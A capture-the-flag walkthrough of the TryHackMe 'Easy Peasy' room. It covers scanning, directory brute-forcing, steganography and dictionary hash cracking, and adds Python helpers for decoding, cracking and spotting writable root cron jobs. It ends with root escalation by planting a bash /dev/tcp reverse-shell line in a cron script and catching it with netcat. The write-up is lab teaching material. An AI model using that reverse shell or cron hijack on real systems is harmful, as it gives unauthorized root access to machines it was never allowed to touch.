Easy Peasy — TryHackMe — WriteUp

TonyRahmos
5 min read · Nov 9, 2020

Hello. I’m Rahmos. Here is my Easy Peasy — TryHackMe — WriteUp. Check it out!

First, deploy the machine and run nmap against all 65535 TCP ports (-p-), with service detection and default scripts (-A):

nmap -A -T4 -p- -v <ip>

A full port scan with version detection takes a while, so be patient!

[screenshot: nmap output]

Three ports are open: 80 (nginx), 6498 (SSH) and 65524 (Apache). First let's look at the website on port 80.

[screenshot: port 80, default nginx page]

It's the default nginx welcome page. Next, brute-force directories on this port with DirBuster (or gobuster, if you prefer the CLI).

[screenshot: DirBuster results]

There are 2 hidden dirs: /hidden and /hidden/whatever. Let’s access the 1st one.

[screenshot: /hidden]

It contains only this image, so it's probably a stego challenge. Download the image to look for hidden data; you can find the image URL with Inspect Element or Ctrl+U (view page source).

[screenshot: page source of /hidden]

steghide extract -sf imagename.jpg

[screenshot: steghide output]

Steghide can't extract anything from this image without the right passphrase. Let's try the other hidden dir.

[screenshot: /hidden/whatever]

It's another image. The page source is always worth checking, so let's look at it.

[screenshot: page source of /hidden/whatever]

As you can see, there is an encoded string, which might be the password for extracting hidden data.

Copy this string and decode it with CyberChef (icyberchef.com).

[screenshot: CyberChef decode]

It's not a password but a flag!

That seems to be all for port 80, so let's move on to the other HTTP port: 65524.

[screenshot: port 65524, Apache default page]

It's the Apache default page. Scroll down and look carefully until you see the 3rd flag.

[screenshot: 3rd flag]

Now request /robots.txt to see if anything interesting is listed.

[screenshot: robots.txt]

The User-agent value in robots.txt is not a real browser string but an MD5 hash. A hash can't be decrypted, only looked up or brute-forced, so try a database of precomputed hashes such as https://md5hashing.net

[screenshot: 2nd flag]

That gives you the 2nd flag.

What next? Again, the page source!

[screenshot: page source of port 65524]

There it is. It's encoded with "ba…", so it will be some BaseXX encoding.

Paste this string into CyberChef and try each Base decoder until one gives readable output. It's Base62.

[screenshot: Base62 decode]
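Clicking through CyberChef's Base decoders one at a time is fine for a single string, but the "try every base until one reads" step (used for the string on port 80 and again here) is easy to script. The block below is an added example, not code from the original write-up or from CyberChef: it runs the candidate decoders over a blob and keeps those whose output is printable text. Base62 is not in Python's standard library, so it is implemented here assuming the alphabet 0-9A-Za-z (CyberChef's default); the binary and ROT13 helpers cover the two remaining encodings that turn up later in the room. All sample inputs are constructed, not strings from the box.

```python
# Added example (not code from the original write-up): try the decodings used
# in this room in turn and keep the candidates that come out as printable text.
# Assumption: Base62 uses the alphabet 0-9A-Za-z, CyberChef's default.
import base64
import binascii
import codecs
import string

BASE62_ALPHABET = string.digits + string.ascii_uppercase + string.ascii_lowercase


def base62_decode(s, alphabet=BASE62_ALPHABET):
    """Base62 (big-endian integer, no padding) -> bytes.
    Leading '0' digits stand for leading zero bytes."""
    n = 0
    for ch in s:
        n = n * 62 + alphabet.index(ch)      # ValueError on a foreign character
    leading = len(s) - len(s.lstrip(alphabet[0]))
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    return b"\x00" * leading + body


def base62_encode(data, alphabet=BASE62_ALPHABET):
    """Inverse of base62_decode; handy for building test vectors."""
    n = int.from_bytes(data, "big")
    digits = ""
    while n:
        n, r = divmod(n, 62)
        digits = alphabet[r] + digits
    leading = len(data) - len(data.lstrip(b"\x00"))
    return alphabet[0] * leading + digits


def binary_to_text(s):
    """'01101000 01101001' -> 'hi' (whitespace-separated 8-bit groups)."""
    return bytes(int(group, 2) for group in s.split()).decode("utf-8")


def rot13(s):
    return codecs.decode(s, "rot_13")


def looks_like_text(b):
    """Accept only bytes that decode as UTF-8 and are printable ASCII."""
    try:
        t = b.decode("utf-8")
    except UnicodeDecodeError:
        return False
    return bool(t) and all(c in string.printable for c in t)


# Candidate decoders; each raises on input outside its alphabet.
DECODERS = {
    "base16": base64.b16decode,
    "base32": base64.b32decode,
    "base64": lambda s: base64.b64decode(s, validate=True),
    "base85": base64.b85decode,
    "base62": base62_decode,
    "binary": lambda s: binary_to_text(s).encode("utf-8"),
}


def try_all(blob):
    """Return {decoder_name: text} for every decoder that yields printable
    text. More than one may match; the reader picks the one that makes sense."""
    hits = {}
    for name, fn in DECODERS.items():
        try:
            out = fn(blob.strip())
        except (ValueError, binascii.Error, UnicodeDecodeError):
            continue
        if looks_like_text(out):
            hits[name] = out.decode("utf-8")
    return hits


if __name__ == "__main__":
    # Constructed sample inputs (not strings from the room).
    for sample in ("ZmxhZ3t0ZXN0fQ==", base62_encode(b"flag{test}"), "01101000 01101001"):
        print(sample, "->", try_all(sample))
    print(rot13("synt{grfg}"))
```

ROT13 is deliberately kept out of `try_all`: any alphabetic input "decodes" to printable text under ROT13, so it would match everything and tell you nothing; apply it by hand when the output of another step looks like shifted letters, as with user.txt later in this room.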

The decoded string is another hidden dir. Let's access it.

Nicely done page! Again, Ctrl+U.

[screenshot: page source of the hidden dir]

You see an image and a hash. Download the image; cracking the hash will give the password for extracting its hidden data.

Copy this hash to a txt file.

Download easypeasy.txt (the wordlist provided by the room) and use john to crack the hash with it:

john --wordlist=easypeasy.txt <your-file-name.txt>

Wait for john to finish, then show the result:

john --show <your-file-name.txt>

[screenshot: john output]

Now I’ve got the password: mypasswordforthatjob
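Both hash steps in this room, the md5hashing.net lookup for the robots.txt User-agent and the john run above, come down to the same thing: the hash is unsalted, so hash every candidate word and compare. The block below is an added example, not part of the write-up and not john's code, showing that dictionary attack in plain Python. It assumes the target is a raw hex digest of one of md5/sha1/sha256/sha512, identified by length alone (john does far more thorough format detection); the wordlist is a constructed stand-in for easypeasy.txt, and the password string from the room is included only so the demo has a hit.

```python
# Added example (not part of the write-up): the dictionary attack that an
# online MD5 lookup and `john --wordlist` both perform for unsalted hashes.
# Assumption: hex digests of md5/sha1/sha256/sha512, identified by length.
import hashlib

ALGOS_BY_HEX_LEN = {32: ("md5",), 40: ("sha1",), 64: ("sha256",), 128: ("sha512",)}

# Constructed wordlist standing in for the room's easypeasy.txt.
WORDLIST = ["password", "letmein", "mypasswordforthatjob", "admin123"]


def digest_hex(word, algo="md5"):
    """Hex digest of a candidate word under the named hashlib algorithm."""
    return hashlib.new(algo, word.encode("utf-8")).hexdigest()


def identify(hexdigest):
    """Candidate algorithms for a hex digest, by length only."""
    return ALGOS_BY_HEX_LEN.get(len(hexdigest.strip()), ())


def crack(hexdigest, wordlist=WORDLIST):
    """Return (algo, word) for the first wordlist entry whose digest matches,
    or None. Digests are compared as lowercase hex strings."""
    target = hexdigest.strip().lower()
    if not all(c in "0123456789abcdef" for c in target):
        return None
    for algo in identify(target):
        for word in wordlist:
            if digest_hex(word, algo) == target:
                return algo, word
    return None


def crack_file(lines, wordlist=WORDLIST):
    """Like `john --show`: map each non-empty line (one hash per line) to
    its result, None meaning 'not in the wordlist'."""
    return {ln.strip(): crack(ln, wordlist) for ln in lines if ln.strip()}


if __name__ == "__main__":
    # Constructed hash file: md5("password") plus a sha1 computed here.
    sample = ["5f4dcc3b5aa765d61d8327deb882cf99",
              digest_hex("mypasswordforthatjob", "sha1")]
    for h, result in crack_file(sample).items():
        print(h, "->", result)
```

The point to take from it: nothing is "decrypted". If the word is not in the wordlist, the attack fails, which is exactly why the room hands you a specific wordlist, and why a real system should store passwords with a salted, slow KDF rather than a bare MD5.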

Now use that password to extract the hidden data from the image downloaded above:

steghide extract -sf binarycodepixabay.jpg

[screenshot: steghide extraction]

Enter the password when prompted. Now read the extracted secrettext.txt.

[screenshot: secrettext.txt]

The password in it is written in binary; convert it to text (8 bits per character).

Now I've got the SSH password. Let's SSH to the machine as user boring on port 6498:

ssh boring@<ip> -p 6498

Enter the password and you’re in!

[screenshot: ssh login]

Get user.txt:

[screenshot: user.txt]

It's encoded with ROT13, so let's decode it.

[screenshot: ROT13 decoded]

Now let’s get root to get the final flag!

I'll use find to list all files owned by boring:

find / -type f -user boring 2>/dev/null

Scroll down and you will see a secret cron job script.

[screenshot: cron job]

Edit this .sh file and add this command to spawn a reverse shell (the file is owned by boring, so we can change it, but cron runs it as root, which is the privilege escalation):

bash -i >& /dev/tcp/<your-host-ip>/4444 0>&1

Then start a listener on your machine:

nc -lvnp 4444

Then wait for the cron job to run the script (running it yourself would only give a shell as boring, not root).

Back on your machine the connection comes in, and I'm root!
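What made this work is a scheduled job running as root that executes a file a low-privilege user can write to. The `find / -user boring` trick finds it by accident; the block below is an added example (not from the write-up) of checking for that misconfiguration directly: parse a system crontab, keep the root jobs, and report any absolute path in their command line that the given user could modify. It assumes the system-crontab layout (`m h dom mon dow user command`, plus the `@reboot user command` shorthand) used by /etc/crontab and /etc/cron.d on Linux, and it checks permission bits only, ignoring ACLs and parent-directory permissions. The crontab and scripts in the demo are constructed in a temp directory, with a hypothetical user that owns neither file.

```python
# Added example (not from the write-up): find root cron jobs whose command
# refers to a file that a low-privilege user can modify.
# Assumptions: system-crontab layout ('m h dom mon dow user command' or
# '@reboot user command') on Linux; permission bits only, no ACL handling.
import os
import stat
import tempfile


def parse_system_crontab(text):
    """Yield (user, command) for each job in a system crontab, skipping
    blank lines, comments and VAR=value assignments."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        if line.startswith("@"):
            parts = line.split(None, 2)          # @reboot user command
            if len(parts) == 3:
                yield parts[1], parts[2]
        else:
            parts = line.split(None, 6)          # m h dom mon dow user command
            if len(parts) == 7:
                yield parts[5], parts[6]


def writable_by(path, uid, gids):
    """True if a principal with this uid and group set may write the file,
    judged from the permission bits (root's override is ignored on purpose:
    we ask what the low-privilege user can do)."""
    try:
        st = os.stat(path)
    except OSError:
        return False
    m = st.st_mode
    return bool((st.st_uid == uid and m & stat.S_IWUSR)
                or (st.st_gid in gids and m & stat.S_IWGRP)
                or m & stat.S_IWOTH)


def root_jobs_writable_by(crontab_text, uid, gids):
    """Return [(command, path)] for root cron jobs where some absolute-path
    argument (so 'bash /tmp/x.sh' counts, not just a bare script path) is
    writable by the given principal."""
    hits = []
    for user, cmd in parse_system_crontab(crontab_text):
        if user != "root":
            continue
        for token in cmd.split():
            if token.startswith("/") and writable_by(token, uid, gids):
                hits.append((cmd, token))
    return hits


def run_demo():
    """Constructed scenario: two root jobs, one of them running a script that
    was left world-writable. Returns the basenames of the flagged files for a
    hypothetical user that owns neither script."""
    with tempfile.TemporaryDirectory() as d:
        safe = os.path.join(d, "rotate.sh")
        weak = os.path.join(d, "backup.sh")
        for p in (safe, weak):
            with open(p, "w") as f:
                f.write("#!/bin/bash\necho running\n")
        os.chmod(safe, 0o755)
        os.chmod(weak, 0o777)                    # the misconfiguration
        crontab = (
            "SHELL=/bin/sh\n"
            "PATH=/usr/bin:/bin\n"
            "# m h dom mon dow user command\n"
            f"0 * * * * root {safe}\n"
            f"* * * * * root /bin/bash {weak}\n"
            f"@reboot root {safe}\n"
        )
        other_uid = os.stat(weak).st_uid + 1     # hypothetical non-owner user
        other_gid = os.stat(weak).st_gid + 1
        hits = root_jobs_writable_by(crontab, other_uid, {other_gid})
        return [os.path.basename(p) for _, p in hits]


if __name__ == "__main__":
    print(run_demo())
```

On a real box you would feed it /etc/crontab and each file under /etc/cron.d with your own `os.getuid()` and `os.getgroups()`; the fix on the defender's side is the mirror image, root-owned scripts with mode 755 or stricter, so that no unprivileged user can turn a scheduled task into a root shell.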

Find the root flag (quote the pattern so the shell doesn't expand it before find sees it):

find / -name "*.txt" 2>/dev/null

[screenshot: find output]

Get your final root flag!

[screenshot: root flag]

The end.

HAPPY HACKING
